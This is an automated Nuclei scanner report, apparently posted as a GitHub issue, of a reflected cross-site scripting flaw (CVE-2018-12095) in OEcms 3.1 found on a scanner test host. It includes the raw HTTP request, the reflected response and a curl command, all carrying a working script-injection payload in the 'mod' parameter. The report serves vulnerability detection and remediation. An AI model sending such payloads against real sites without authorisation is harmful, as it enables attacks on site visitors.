OEcms 3.1 - Cross-Site Scripting (CVE-2018-12095) found on honey.scanme.sh

Details: CVE-2018-12095 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Timestamp: Tue Apr 30 13:42:07 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/528ba8a2d27924535f67d3c2d6320be2

Template Information

Key	Value
Name	OEcms 3.1 - Cross-Site Scripting
Authors	logicalhunter
Tags	cve2018, cve, xss, edb, oecms_project
Severity	medium
Description	OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.
Remediation	Apply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability.
CVSS-Metrics	CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CWE-ID	CWE-79
CVE-ID	CVE-2018-12095
CVSS-Score	5.40
vendor	oecms_project
product	oecms

Request

GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 330
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:07 GMT

GET /cms/info.php?mod=list</script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42' 'https://honey.scanme.sh/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

Generated by Nuclei v3.2.5

mkrs2404 / tickets

OEcms 3.1 - Cross-Site Scripting (CVE-2018-12095) found on honey.scanme.sh #20